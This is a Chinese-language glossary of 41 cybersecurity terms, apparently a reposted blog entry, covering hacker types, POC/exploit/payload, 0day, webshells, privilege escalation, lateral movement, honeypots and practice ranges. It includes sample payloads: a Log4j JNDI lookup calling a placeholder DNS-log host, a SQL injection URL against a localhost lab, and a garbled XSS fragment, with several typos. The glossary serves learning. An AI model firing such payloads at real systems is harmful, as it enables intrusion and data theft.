标签：术语 漏洞 labs 安全 黑客 沙箱 靶场 权限

 

1、黑客（hacker）---对计算机技术非常擅长的人，窃取数据，破坏计算机系统

2、脚本小子---刚刚入门安全行业，学习了一些技术，指挥使用现成的工具或者从网上复制代码。

3、白帽子---白帽子的目的是发现企业的漏洞并且上报给企业，帮助其解决风险问题（360补天，漏洞盒子，CNVD，CNNVD）

4、红帽黑客---有正义感，爱国的黑客。利用技术维护国家网络安全，并且对外来的攻击进行反击。

5、漏洞(英文vulneability)：

漏洞指的是硬件，软件按协议等等存在的安全缺陷

 

6、POC （Proof of Concept）

能证明漏洞存在的代码
例：S{jndi:ldap://xxxxxx.dnslong.cn/test}

 

7、exp（Exploit--利用）

执行了这一段利用代码之后，就能够达到攻击的目的。

 

8、payload：载荷

①SQL注入(http://localhost/sqli-labs/;ess-3/?id=-1' union select 1,1.database()--+)

②XSS (< >(1)< />) 空格去掉

③log4j ${jndi:ldap://xxxxx/dms;pg.cn/test}

9、0day：使用量非常大的产品被发现 官方还未发布补丁和恢复

10、1day：漏洞被公开但是公布时间段导致还没有大范围的补丁修复

11、Nday漏洞：漏洞公开并且已经过去比较长的时间的漏洞

12、漏扫：基于数据库对漏洞进行自动化扫描 AWVS appscan

13、补丁：patch 漏洞修复程序

14、渗透：pennetration 黑客入侵获取权限的过程

15、渗透测试：pennetration test 授权后的入侵获取权限

16、木马：Trojan house 隐藏在系统中的恶意程序

17、病毒：Virus 恶意代码或程序

18、杀毒软件：瑞星 金山 卡巴斯基 360

19、免杀 ：绕过杀毒软件

20、肉鸡：被黑客获取了控制权限的机器，可能是个人电脑也可能是企业的服务器

21、抓鸡：通过漏洞，自动化的获取肉鸡的行为

22、跳板机：自己的电脑容易被溯源，所以通过肉鸡的电脑进行转接

23、DDOS：Distributed Denial of Service 分布式拒绝服务攻击 发起大量恶意请求，导致正常用户无法访问

24、后门：backdoor 黑客为了对主机进行长期控制，在计算机上种植的一段程序或留下的一个“入口”，木马可能会充当后门

25、中间人攻击 在客户端与服务器之间布置一台黑客的服务器作为中转，从而窃取、篡改用户请求服务信息

26、网络钓鱼 冒充网站，窃取用户的账号密码

27、webshell shell是一种命令执行工具，可以对计算机进行控制asp php jsp之外的代码文件，可以通过这些代码文件可以执行任意的命令，对计算机做任意的操作，分为小马(仅有文件上传功能)、一句话木马，通过一些网站管理工具来连接、大马，一个有可操作界面的木马

28、Getshell 获得执行命令的环境(redis持久化 mysql写文件的功能 mysql的日志记录功能 上传功能 数据备份功能 编辑器)

29、提权 通过漏洞使得自己获取的一个用户权限升级为管理员权限

30、拿站 拿到了最高权限

31、拖库 把网站的全部数据导出了

32、撞库 获取裤子去批量登录其他网站，因为部分人建立账号密码都相同

33、旁站入侵 入侵同服务器的其他网站

34、横向移动 攻击者入侵一台服务器陈恭候，基于内部网络，继续入侵同网段的其他机器

35、代理 Proxy 带我们发起网络请求的一台服务器

36、VPN Virtual Private Network 代理 加密通信 办公-在家里连到公司内网

37、 蜜罐 Honeypot 吸引攻击者攻击的伪装系统，用来实现溯源和反制 免费蜜罐HFish

38、沙箱 Sandbox 沙箱是一种按照安全策略限制程序行为的执行环节，就算用恶意代码，也只能影响沙箱环境而不会影响到操作系统 云沙箱-微步

39、靶场 模拟有漏洞的环境 可以是网站、容器、操作系统等

①web综合靶场-DVWA pikachu bwapp

②web专用靶场-sqli-labs、upload-labs、xss-labs

③漏洞复现靶场-比如CVE 44228

④操作系统靶场-vulnhub

⑤CTF靶场-专门用来联系CTF题目，每个人都有一个独立的环境

40、堡垒机 跳板机 运维审计系统-管理一些资源、用户、虚拟机等

41、WAF Web Application Firewall 网络应用防火墙 对HTTP和HTTPS的流量内容进行分析、拦截恶意攻击行为

标签：术语,漏洞,labs,安全,黑客,沙箱,靶场,权限
来源： https://www.cnblogs.com/hx0708/p/16425038.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。